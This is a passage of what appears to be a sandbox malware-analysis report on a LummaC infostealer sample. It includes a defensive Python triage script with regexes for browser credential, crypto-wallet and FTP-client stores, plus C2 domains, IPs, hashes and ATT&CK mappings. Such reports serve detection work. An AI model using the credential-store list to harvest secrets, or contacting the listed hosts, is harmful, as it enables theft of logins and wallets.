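    r"^Source: (?P<process>.+?\.exe)(?:, )?(?P<event>File opened|Directory queried): "
    r"(?P<path>.+?)(?:Jump to behavior)?$"
)

# Artifact classes (assumed starter list): the regexes cover the paths seen in this report
# plus the obvious sibling browser files. Extend per environment.
CATEGORIES = {
    "browser_credentials": [
        r"\\Login Data$", r"\\Cookies$", r"\\key4\.db$", r"\\logins\.json$",
    ],
    "browser_extension_storage": [
        # Chrome extension IDs are 32 characters drawn from a-p; wallet extensions keep
        # their state under Local/Sync Extension Settings.
        r"\\(?:Local|Sync) Extension Settings\\[a-p]{32}$",
    ],
    "desktop_wallet": [
        r"\\Exodus\\exodus\.wallet$", r"\\Electrum(?:-LTC)?\\wallets$", r"\\Bitcoin\\wallets$",
        r"\\Coinomi\\Coinomi\\wallets$", r"\\Ledger Live$", r"\\atomic\\Local Storage\\leveldb$",
        r"\\com\.liberty\.jaxx\\IndexedDB$", r"\\Guarda\\IndexedDB$", r"\\Binance$",
    ],
    "ftp_client": [
        r"\\FTPbox$", r"\\SmartFTP\\Client 2\.0\\Favorites$", r"\\FTPRush$",
        r"\\FTPGetter$", r"\\FTPInfo$", r"\\SiteDesigner\\3D-FTP$",
    ],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats] for cat, pats in CATEGORIES.items()}


def parse_events(text):
    """Split behaviour lines into {process, event, path} records; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def classify(path):
    """Return the artifact class a path belongs to, or None when it is not a known credential store."""
    for cat, patterns in COMPILED.items():
        if any(p.search(path) for p in patterns):
            return cat
    return None


def triage(text, min_categories=2):
    """Summarise which credential stores a sample touched and give a verdict.

    Distinct paths are counted per class, so a file re-opened several times
    (exodus.wallet appears twice in this report) is scored once."""
    seen = defaultdict(set)
    unclassified = set()
    for ev in parse_events(text):
        cat = classify(ev["path"])
        if cat:
            seen[cat].add(ev["path"])
        else:
            unclassified.add(ev["path"])
    counts = {cat: len(paths) for cat, paths in seen.items()}
    hit_classes = sum(1 for c in counts.values() if c)
    verdict = ("stealer-like: credential/wallet harvesting" if hit_classes >= min_categories
               else "insufficient credential-store activity")
    return {
        "counts": counts,
        "artifacts": {cat: sorted(paths) for cat, paths in seen.items()},
        "unclassified": len(unclassified),
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    print(result["verdict"])
    for cat, paths in result["artifacts"].items():
        print(f"{cat} ({len(paths)}):")
        for p in paths:
            print("   ", p)
```

Run as a script it prints the verdict and the de-duplicated artifact list per class; fed the full listing from a report it gives a compact picture of what the sample went after. Counting distinct paths per class rather than raw events keeps a sample that re-opens one wallet file a dozen times from outscoring one that quietly touches six different stores, and the threshold on the number of classes, not on the number of events, is what separates a stealer from a legitimate browser or wallet process that touches its own store.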

Remote Access Functionality

Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix

The number in parentheses is the hit count the report assigns to that technique; entries without a number are the matrix's default placeholder techniques with no match for this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop
Antivirus Detection

Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL Reputation

Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | 0% | URL Reputation | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
URLs

Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/hd | file.exe, 00000000.00000003.2340513943.00000000014DB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.sto | file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/apis? | file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apix | file.exe, 00000000.00000003.2341515755.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351913057.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341482774.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2349342811.00000000014A6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/api7U | file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microX | file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340779030.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/p | file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/k | file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/ | file.exe, 00000000.00000003.1950914872.00000000014D8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store:443/apil | file.exe, 00000000.00000003.2348526012.000000000145F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/apis9 | file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/C | file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api | file.exe, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/K | file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/qP | file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | necklacedmny.store | European Union | 13335 | CLOUDFLARENETUS | true
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1544564
                                                                                Start date and time:2024-10-29 15:26:07 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 2s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:file.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                                EGA Information:Failed
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7636 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: file.exe
Time | Type | Description
10:27:13 | API Interceptor | 1804514x Sleep call for process: file.exe modified
Match: 188.114.96.3
Associated Sample Name / URL | Detection | Threat Name | Context
zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/jI82Ms6K/download
9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT | 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
DBUfLVzZhf.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
R5AREmpD4S.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
7950COPY.exe | malicious | FormBook | www.globaltrend.xyz/b2h2/
transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | paste.ee/d/Gitmx
19387759999PO-RFQ-INVOICE-doc.exe | malicious | FormBook | www.zonguldakescortg.xyz/483l/
PO 4800040256.exe | malicious | FormBook | www.rtpngk.xyz/876i/
yGktPvplJn.exe | malicious | Pushdo | www.fnsds.org/
Match: necklacedmny.store
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 188.114.97.3
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
New Portable Document.pdf | malicious | Unknown | 188.114.96.3
2DpxPyeiUv.exe | malicious | Stealc, Vidar | 172.64.41.3
installer.exe | malicious | Unknown | 172.67.75.163
installer.exe | malicious | Unknown | 104.26.8.59
https://trainingndt.com/ | malicious | Unknown | 104.22.72.81
Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdf | malicious | HTMLPhisher | 104.17.25.14
z59IKE.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
zxalphamn.doc | malicious | Lokibot | 188.114.97.9
CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml | malicious | HTMLPhisher | 104.18.95.41
http://url5148.librariapena.com/ls/click?upn=u001.GicqFEndYG5aFpuN1ngPufTfXrsQ9xNlNirpytR4MM9aBsYYFODsiAPftWqmKpvrE6ff_B2fWkfszhSflnL0HA3FnQqEKk1HJkizy-2Fud2LEQeI5aha2K2G6ppF2O0bL7D7H7LMN8WGu5xRF2M8uaTM6MXf6DAMaADWmIUL1YqZWKrQh1g-2F0n0cxV2mRrNZEteUwfW5DOdClcZ0c7E-2FIhACBFYnzvVFSnfSt3CZCN7P1EL1QyPVm42KBQGCDp3btvtG-2BbRJha-2FOyJXx-2BDZbno3l2jsvw-2FwkacYeoKE0uINsamNbg0rV0A52QCvn7k6VYTShXjbi9u51Z787-2F01bX1DTA9aSBSP-2FWMLEspaU-2FIdc1x-2FmRDSh7t6BQtQAtVlDsdci-2FkdE5XEzXcy1T7RT1mRx0Z8c0C7T5TxNvH7MOJLp-2BPx4LTMm4cKm4w-2Br4av4rqX3sFI-2B0Z54CPJjpfmgkQpOwbMxDkpsmVoLcKhd8rV7DcMtFguJaotRS3nEWM4vOO-2FegVGhzrwPBH6NjA2esFflr-2FYmA56ZztqyuVYNkq6vFbZhu3qpImgcxi-2BBybDKRWWCy9ZJhz5kW6d7c5iFMdA14shvBlO5oteNsOg1T8Wcd4MIJllivR5RQLa6JKyKUfgK8kF9DoOU4JGzocfITKQs9Z05ET92-2FS1aC5wu-2FuyffXQ4VOTrXPB9d3zUlvAaEdOc87CGa5e4y4lu-2F-2B9njpJqjlihSLoXPx3uHJhhT5l60Eu-2Fd0OnNMVN2uGoOn8P4Kyfxcr-2B3atbrIS84kkAo7VV7ElDHFn2Wn-2B0iZqwoFL1t1YCz2cR3xAkH3Dm45o7ag9bF7tv0L4g2t8v1fAwuiPylHAHkqFOEcwcDndKNNLE7ObrCi0wDxBijc-2FYVZU6-2F0yIfBAmiocABK2NEl2-2F-2FPMERnDYg-3D-3D | malicious | HTMLPhisher | 104.17.25.14
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
buNtKcYHCa.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
ST007 SWIFT CONFIRMATION.xls | malicious | Unknown | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
                                                                                No context
                                                                                No created / dropped files found
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.608120174146751
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:file.exe
                                                                                File size:2'964'992 bytes
                                                                                MD5:e8febbee7f62ca4c85f34bccb279eb67
                                                                                SHA1:610b9007b886130f73e723daf0fc8222ee66a396
                                                                                SHA256:7b054538e0120d88a52303efa5128a62c629ded45f5fafeadf93b9f284d1a70a
                                                                                SHA512:45057443f147c41e1453c8c541b15d0fa7d0515f947138952555ef0d146df1eec79dab71c948990c243ca200bec3a2167b6e5b123914a3f872d3a7cf66237a23
                                                                                SSDEEP:49152:PGPwcdKmXAMVjTMBCH2fd7MxuCvYBXJI9lNTqfV7L:ePLdKmXAMVjIBTS38aNTqfV7L
                                                                                TLSH:DCD54A92A48CB1CFD48E27749327CD87585C03B94F285DD7A92CA8B97E67CC513B6C28
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P0...........@...........................0......:....@.................................T...h..
                                                                                Icon Hash:00928e8e8686b000
                                                                                Entrypoint:0x705000
                                                                                Entrypoint Section:.taggant
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                Instruction
                                                                                jmp 00007EFFACEF260Ah
                                                                                hint_nop dword ptr [00000000h]
                                                                                add cl, ch
                                                                                add byte ptr [eax], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [esi], al
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], dh
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+eax], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                and dword ptr [eax], eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [eax+00000000h], eax
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add eax, 0000000Ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], dh
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [edx], ecx
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                inc eax
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [eax], eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                pop es
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+0Ah], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                pop es
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
